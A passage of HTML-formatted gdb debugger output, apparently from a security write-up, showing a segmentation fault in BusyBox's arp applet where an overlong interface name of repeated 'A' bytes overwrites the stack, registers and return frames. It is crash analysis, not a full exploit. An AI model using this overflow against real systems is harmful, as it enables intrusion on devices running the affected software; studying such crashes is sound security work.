class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-e\">received <\/span><span class=\"crayon-e\">signal <\/span><span class=\"crayon-v\">SIGSEGV<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Segmentation <\/span><span class=\"crayon-v\">fault<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-10\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x080b8a5b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vfprintf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">eax<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">ecx<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">edx<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">ebx<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0xbffff42c<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1073744852<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">esp<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0xbfffee6c<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0xbfffee6c<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">ebp<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0xbffff408<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0xbffff408<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">esi<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x1a<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">26<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">edi<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x41414141<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">1094795585<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-20\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">eip<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x80b8a5b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x80b8a5b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">vfprintf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">13739<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-21\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">eflags<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x10246<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PF <\/span><span class=\"crayon-e\">ZF <\/span><span class=\"crayon-st\">IF<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">RF<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-22\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">cs<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x73<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">115<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-23\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">ss<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">123<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-24\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">ds<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">123<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-25\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">es<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">123<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-26\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">fs<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-27\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">gs<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x33<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">51<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-28\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bt<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-29\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#0&nbsp;&nbsp;0x080b8a5b in vfprintf ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-30\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#1&nbsp;&nbsp;0x0805b629 in vasprintf ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-31\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#2&nbsp;&nbsp;0x080f02aa in bb_verror_msg (s=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;, p=0xbffff540 &#8216;A&#8217; &lt;repeats 103 times&gt;, strerr=0x823a798 &#8220;No such device&#8221;)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-32\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-v\">libbb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">verror_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">31<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-33\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#3&nbsp;&nbsp;0x080f18a1 in ioctl_or_perror_and_die (fd=3, request=35111, argp=0xbffff544, fmt=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-34\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-v\">libbb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xfuncs_printf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">508<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-35\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#4&nbsp;&nbsp;0x0811365d in arp_getdevhw (ifname=0x41414141 &lt;Address 0x41414141 out of bounds&gt;, sa=0x41414141) at networking\/arp.c:222<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-36\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#5&nbsp;&nbsp;0x41414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-37\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#6&nbsp;&nbsp;0x41414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-38\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#7&nbsp;&nbsp;0x41414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-39\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#8&nbsp;&nbsp;0x41414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-40\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#9&nbsp;&nbsp;0x41414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-41\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-42\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bt <\/span><span class=\"crayon-v\">full<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-43\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#0&nbsp;&nbsp;0x080b8a5b in vfprintf ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-44\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">No <\/span><span class=\"crayon-e\">symbol <\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-e\">info <\/span><span class=\"crayon-v\">available<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-45\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#1&nbsp;&nbsp;0x0805b629 in vasprintf ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-46\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">No <\/span><span class=\"crayon-e\">symbol <\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-e\">info <\/span><span class=\"crayon-v\">available<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-47\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#2&nbsp;&nbsp;0x080f02aa in bb_verror_msg (s=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;, p=0xbffff540 &#8216;A&#8217; &lt;repeats 103 times&gt;, strerr=0x823a798 &#8220;No such device&#8221;)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-48\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-v\">libbb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">verror_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">31<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-49\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">Address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">out <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-v\">bounds<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-50\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-51\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">applet_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1073744492<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-52\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">strerr_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1073744524<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-53\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msgeol_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-54\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">used<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1073744508<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-55\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#3&nbsp;&nbsp;0x080f18a1 in ioctl_or_perror_and_die (fd=3, request=35111, argp=0xbffff544, fmt=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-56\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-v\">libbb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xfuncs_printf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">508<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-57\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-58\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbffff540<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">103<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-59\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#4&nbsp;&nbsp;0x0811365d in arp_getdevhw (ifname=0x41414141 &lt;Address 0x41414141 out of bounds&gt;, sa=0x41414141) at networking\/arp.c:222<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-60\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">ifr_ifrn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">ifrn_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifr_ifru<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">ifru_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">sa_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16705<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sa_data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-61\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ifru_dstaddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">sa_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16705<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sa_data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifru_broadaddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">sa_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16705<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-62\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sa_data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifru_netmask<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">sa_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16705<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sa_data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifru_hwaddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-63\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sa_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16705<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sa_data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 